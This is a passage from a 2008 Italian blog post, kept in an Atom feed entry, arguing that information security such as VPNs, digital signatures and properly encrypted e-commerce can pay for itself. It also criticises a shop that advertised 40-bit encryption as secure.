un'ottica di risparmio e guadagno e non più come un fastidioso costo da sostenere.&lt;br /&gt;Soprattutto in periodi di tagli ai costi per rimanere competitivi.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Può una spesa in favore di sicurezza informatica diventare un vero e proprio investimento?&lt;/span&gt;&lt;br /&gt;Certamente si.&lt;br /&gt;&lt;br /&gt;Tecnologie di sicurezza hanno negli anni reso possibile l'implementazione di altre tecnologie che&lt;br /&gt;hanno a loro volta reso possibile nuovi processi di business e aumentato la produttività.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Un esempio lamapante sono le VPN.&lt;/span&gt;&lt;br /&gt;Confidenzialità dell'informazione tra postazioni remote è stata la parola chiave senza la quale&lt;br /&gt;connettere 2 locazioni tra esse lontane non sarebbe stato altrimenti possibile.&lt;br /&gt;&lt;br /&gt;Chi andrebbe a connettere una postazione remota con scambio di dati critici senza la presenza&lt;br /&gt;di metodi di cifratura affidabili. La sicurezza è stata la chiave per una enabling technology.&lt;br /&gt;&lt;br /&gt;Le VPN hanno aperto a nuovi modi di concepire il lavoro. Avere l'ufficio in casa o connettere 2 branch in continenti diversi migliora l'efficienza e la produttività innegabilmente. E la sicurezza è condizione necessaria perchè ciò avvenga.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Firma digitale&lt;/span&gt;&lt;br /&gt;Un'altra rivoluzionaria tecnologia che "potrebbe" fare da enabling technology.&lt;br /&gt;Ho avuto l'opportunità di partecipare attivamente ad un progetto del CNR di Pisa il cui principale&lt;br /&gt;obiettivo era quello di semplificare il più possibile la circolazione di documenti elettronici in una organizzazione andando ad abbattere i costi legati alla gestione dei cartacei che sono assolutamente rilevanti e paradossali nel 2008.&lt;br /&gt;&lt;br /&gt;La firma digitale in ambiente privato aziendale velocizzerebbe molti processi di approvazione&lt;br /&gt;di documenti senza dover passare di dipartimento in dipartimento in maniera cartacea solo per la necessità della firma.&lt;br /&gt;Un repository dei documenti su un server + una certification authority interna andrebbe a liberare interi uffici e burocrati. Un enorme risparmio, a fronte di qualche policy in più.&lt;br /&gt;&lt;br /&gt;Nella pubblica amministrazione lo Stato andrebbe a risparmiare un quantitativo enorme di denaro nella gestione delle pratiche che verrebbero altrettanto velocizzate.&lt;br /&gt;Molti uffici scomparirebbero, molti posti di lavoro (inutile), si perderebbero.&lt;br /&gt;&lt;br /&gt;A guadagnarci sarebbe lo Stato e il cittadino. Un po meno per chi dal timbra, protocolla e firma ne ha tratto stipendio.&lt;br /&gt;&lt;br /&gt;Ancora una volta una tecnologia di sicurezza che permette un guadagno rilevante in termini di maggiore efficienza e  abbattimento dei costi.&lt;br /&gt;&lt;br /&gt;Il problema della firma digitale, in Italia sopattutto, è un problema di mentalità.&lt;br /&gt;Lo Cnipa &lt;a href="http://www.cnipa.gov.it/site/_files/LineeGuidaFD_200405181.pdf"&gt;ha già regolarizzato&lt;/a&gt; la questione qualche anno fa.&lt;br /&gt;Nonostante ciò, il timore della ripudiabilità della firma è sentito ancora forte.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;L'ultimo esempio è quello del &lt;span style="font-weight: bold;"&gt;commercio elettronico "sicuro"&lt;/span&gt;, che non esiste ma che nel migliore dei mondi possibili sarebbe stato reso possibile solo tramite l'uso di tecnologie di sicurezza operanti a vari livelli (dal 3 al 7 dell'OSI classico).&lt;br /&gt;&lt;br /&gt;Prima chiariamo perché non esiste attualmente.&lt;br /&gt;&lt;br /&gt;Navigando in uno dei siti di e-commerce europei più in vista&lt;br /&gt;si leggono testuali parole: &lt;blockquote&gt;&lt;br /&gt;"Grazie a questa tecnologia, che utilizza un complesso sistema di crittografia con chiave a 40 bit, le informazioni riservate, inviate al server sicuro X, viaggiano su Internet solo in forma criptata, ovvero codificate secondo un complesso algoritmo matematico che ne garantisce l'illeggibilità da parte di&lt;br /&gt;chiunque voglia intromettersi durante la comunicazione tra Voi e X"&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;40 bit? Complesso sistema di crittografia? Qualcuno dica a questi signori che gli Stati Uniti,&lt;br /&gt;dopo la seconda guerra mondiale, furono abbastanza  lungimiranti nel &lt;a href="http://en.wikipedia.org/wiki/Export_of_cryptography"&gt;proibire l'esportazione&lt;br /&gt;di algoritmi di cifratura&lt;/a&gt; "troppo potenti" (per i loro cluster di decifratura).&lt;br /&gt;&lt;br /&gt;Ma "40 bit" non è troppo potente. E' semplicemente troppo ridicolo e fuori anche dagli standard &lt;a href="https://www.pcisecuritystandards.org/"&gt;PCI &lt;/a&gt;che dettano un limite minimo di 128 bit.&lt;br /&gt;&lt;br /&gt;Il commercio elettronico è stata un'onda cavalcata ancor prima che la sicurezza potesse fornirgli gli strumenti adeguati ad una sua legittima diffusione. La confidenzialità della comunicazione è solo la punta dell'iceberg di una serie di vulnerabilità a cui questi siti possono andare incontro.&lt;br /&gt;&lt;br /&gt;A metterci una pezza, dopo anni in cui siti di ecommerce sono nati da realtà di ogni natura e dimensione, sono state le regulation per la PCI compliance che rende questi siti finalmente responsabili delle loro stesse inadempienze.&lt;br /&gt;&lt;br /&gt;In un mondo ideale (quello in cui vivono la maggior parte degli appassionati di sicurezza)&lt;br /&gt;sarebbe stata la sicurezza a fare da enabling technology per il commercio elettronico&lt;br /&gt;e non il contrario. In questo caso un piano di sicurezza (per il cliente e per il fornitore) sarebbe dovuto nascere ben prima di qualsiasi carrello elettronico.&lt;br /&gt;&lt;br /&gt;E' chiaro quindi che la PCI compliance, nel mondo reale a 40 bit, diventa un costo da sostenere e non più un opportunità.&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;a href="http://dilbert.com/strips/comic/2008-09-24/" title="Dilbert.com"&gt;&lt;img style="width: 418px; height: 129px;" src="http://dilbert.com/dyn/str_strip/000000000/00000000/0000000/000000/20000/6000/100/26130/26130.strip.gif" alt="Dilbert.com" border="0" /&gt;&lt;/a&gt;&lt;/center&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;
&lt;a href="http://www.hackerscenter.com"&gt;Hackers Center&lt;/a&gt; &lt;font color="green"&gt; - 1300 testi, 800 tools + blogs, exploits and researches&lt;/font&gt;&lt;br /&gt;
&lt;a href="http://www.securitybrigade.com"&gt;Security Brigade&lt;/a&gt; &lt;font color="green"&gt; - Security services&lt;/font&gt;
&lt;hr /&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3119071581036116485-7083375763339560357?l=www.armandoromeo.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/nkmUh3sQk6v5bH9eoonQHbtENOE/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/nkmUh3sQk6v5bH9eoonQHbtENOE/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/nkmUh3sQk6v5bH9eoonQHbtENOE/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/nkmUh3sQk6v5bH9eoonQHbtENOE/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=3PAImzoXwgs:C31wElehmVU:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=3PAImzoXwgs:C31wElehmVU:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=3PAImzoXwgs:C31wElehmVU:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=3PAImzoXwgs:C31wElehmVU:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=3PAImzoXwgs:C31wElehmVU:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=3PAImzoXwgs:C31wElehmVU:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=3PAImzoXwgs:C31wElehmVU:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=3PAImzoXwgs:C31wElehmVU:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/3PAImzoXwgs" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/7083375763339560357?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/7083375763339560357?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/3PAImzoXwgs/sicurezza-informatica-produttivit.html" title="Sicurezza produce efficienza che produce guadagno" /><author><name>Armando Romeo</name><uri>http://www.blogger.com/profile/17178561136430555875</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://4.bp.blogspot.com/_-FDKJTRMHR0/S9LqZyx8DRI/AAAAAAAAAEI/yiTq9_XrKEs/S220/3.jpg" /></author><feedburner:origLink>http://www.armandoromeo.com/2008/10/sicurezza-informatica-produttivit.html</feedburner:origLink></entry></feed>

